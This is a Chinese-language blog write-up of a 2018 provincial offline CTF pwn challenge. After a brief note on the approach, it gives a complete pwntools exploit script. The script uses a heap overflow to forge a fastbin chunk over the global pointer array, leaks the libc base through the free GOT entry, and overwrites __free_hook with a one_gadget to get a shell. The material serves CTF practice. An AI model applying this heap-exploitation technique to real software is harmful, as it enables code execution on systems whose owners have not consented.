18年省赛线下pwn1

之前看到的然后就做了一下,洞很多,利用方式也很多样。我当时挑了一个我还算熟悉的方式来做。(结果还是做了将近2个小时,换到现场比赛早结束了

大体就是构造一个chunk到题目里保存堆指针的地方,具体的我也忘了。放一下当时画的图(草稿

这题好像是不限制你的输入长度的,看了图想起来了,就是通过改下一个chunk的头来做
#!/usr/bin/env python
# coding=utf-8
from pwn import *
# from libnum import *

context.log_level = 'debug'
context.terminal = ['xfce4-terminal','-x','bash','-c']
# context.arch = 'i386'

s       = lambda string             :sh.send(string)
sl      = lambda string             :sh.sendline(string)
sla     = lambda delim,string       :sh.sendlineafter(delim,string)
sa      = lambda delim,string       :sh.sendafter(delim,string)
ru      = lambda string             :sh.recvuntil(string)
rl      = lambda                    :sh.recvline()
rv      = lambda                    :sh.recv()
it      = lambda                    :sh.interactive()
cl      = lambda                    :sh.close()

local = 1
if local:
  # sh = gdb.debug('./orw','b *0x08048571\nc')
  sh = remote('0.0.0.0', 9999)
  # sh = process('./pwn1')
  bin = ELF('./pwn1')
  libc = ELF('/root/ctf/PWN/libc/libc6_2.23-0ubuntu11_amd64.so')
  #libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
  sh = remote('buuoj.cn', 20001)
  bin = ELF('./pwn1')
  libc = ELF('/root/ctf/PWN/libc/libc6_2.23-0ubuntu11_amd64.so',checksec = False)
def z(a=''):
  # gdb.attach(sh)
  gdb.attach('pwn1',a,exe='./pwn1')
  if a == '':
    raw_input()

def add(index, size, content):
  sla('>> ', '1')
  sla('Index: ',str(index))
  sla('Length: ', str(size))
  if size > 0x20:
    sla('message too long, you can leave on memo though\n', content)
  else:
    sla('Message: ', content)

def change_target(index):
  sla('>>','1')
  sla('Index: ',str(index))

def update(content):
  sla('>> ', '2')
  sla('Edit message: ', content)

def free(index):
  sla('>> ', '4')
  sla(':', str(index))

def dump(index):
  sla('>> ', '3')
  sla('Index: ', str(index))

sla(': ', 'youzhiyuan')
sla(') ', 'n')
add(0,0x20,'a'*0x20)
add(1,0x10,'b'*0x20)
add(2,0x20,'c'*0x20)
free(1)
free(0)
add(0,0x40,'d'*0x20+'\x00'*8 + '\x21' + '\x00'*7 + p64(0x602A60))
add(1,0x10,'e'*0x10)
add(0,0x10,'hello world')
update(p64(bin.got['free']) + p64(0x602A70))
dump(0)
ru('View Message: ')
free = u64(rl()[:6] + '\x00'*2)
libc_base = free - libc.symbols['free']
free_hook = libc_base + libc.symbols['__free_hook']
one_gadget = libc_base + 0x4526a
change_target(1)
update(p64(free_hook))
change_target(0)
update(p64(one_gadget))
sl('4')
sla('Index: ',str(0))
sl('cat flag')
# z('c')
it()

说点什么

avatar

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

  Subscribe  
提醒